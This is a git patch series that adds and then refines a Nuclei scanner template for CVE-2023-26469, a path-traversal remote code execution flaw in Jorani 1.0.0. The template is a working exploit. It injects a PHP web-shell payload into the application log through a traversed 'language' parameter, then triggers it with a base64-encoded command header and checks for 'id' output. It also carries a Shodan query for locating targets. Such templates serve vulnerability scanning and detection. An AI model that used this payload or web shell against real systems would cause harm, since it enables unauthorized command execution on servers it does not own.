From a397e12906bf797b8c80b5405d7f610bf1d38008 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 30 Aug 2023 23:01:52 +0530
Subject: [PATCH 1/2] CVE-2023-26469

---
 http/cves/2023/CVE-2023-26469.yaml | 59 ++++++++++++++++++++++++++++++
 1 file changed, 59 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-26469.yaml

diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
new file mode 100644
index 0000000000..761afa5189
--- /dev/null
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-26469
+
+info:
+  name: Jorani - Remote Code Execution
+  author: pussycat0x
+  severity: critical
+  description: |
+     Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-26469
+    - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
+  metadata:
+    max-request: 3
+    shodan-query: http.title:"jorani"
+    verified: true
+  tags: cve,cve2023,jorani,rce
+
+variables:
+  cmd: "id"
+  payload: "<?php if(isset($_SERVER['HTTP_{{randstr}}'])){system(base64_decode($_SERVER['HTTP_{{randstr}}']));} ?>"
+
+http:
+  - raw:
+      - |
+        GET /session/login HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+
+      - |
+        POST /session/login HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword
+
+      - |
+        GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        X-REQUESTED-WITH: XMLHttpRequest
+        OYHTUCUZITWV: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
+
+    extractors:
+      - type: regex
+        part: body_1
+        group: 1
+        internal: true
+        name: csrf
+        regex:
+          - 'name="csrf_test_jorani" value="(.*?)"'
\ No newline at end of file

From 12c478a2c80c0cc3f64f16dbfa6d3fe77faf4b30 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 31 Aug 2023 01:31:43 +0530
Subject: [PATCH 2/2] minor update

---
 http/cves/2023/CVE-2023-26469.yaml | 33 ++++++++++++++++++++----------
 1 file changed, 22 insertions(+), 11 deletions(-)

diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
index 761afa5189..865706cb4f 100644
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-26469
 
 info:
-  name: Jorani - Remote Code Execution
+  name: Jorani 1.0.0 - Remote Code Execution
   author: pussycat0x
   severity: critical
   description: |
@@ -9,27 +9,34 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-26469
     - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
+    - https://github.com/advisories/GHSA-7r9h-9r47-7vjj
+    - http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-22
+    epss-score: 0.22328
+    cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:*
   metadata:
     max-request: 3
-    shodan-query: http.title:"jorani"
+    shodan-query: http.favicon.hash:-2032163853
     verified: true
-  tags: cve,cve2023,jorani,rce
+  tags: cve,cve2023,jorani,rce,packetstorm
 
 variables:
   cmd: "id"
-  payload: "<?php if(isset($_SERVER['HTTP_{{randstr}}'])){system(base64_decode($_SERVER['HTTP_{{randstr}}']));} ?>"
+  payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){system(base64_decode($_SERVER['HTTP_{{header}}']));} ?>"
+  header: "{{to_upper(rand_base(12))}}"
 
 http:
   - raw:
       - |
         GET /session/login HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
 
       - |
         POST /session/login HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
         Content-Type: application/x-www-form-urlencoded
 
         csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword
@@ -37,23 +44,27 @@ http:
       - |
         GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
         X-REQUESTED-WITH: XMLHttpRequest
-        OYHTUCUZITWV: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
+        {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
 
     cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: regex
-        part: body
+        part: body_3
         regex:
           - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
 
+      - type: status
+        part: header_3
+        status:
+          - 401
+
     extractors:
       - type: regex
-        part: body_1
+        part: body
         group: 1
         internal: true
         name: csrf
         regex:
-          - 'name="csrf_test_jorani" value="(.*?)"'
\ No newline at end of file
+          - 'name="csrf_test_jorani" value="(.*?)"'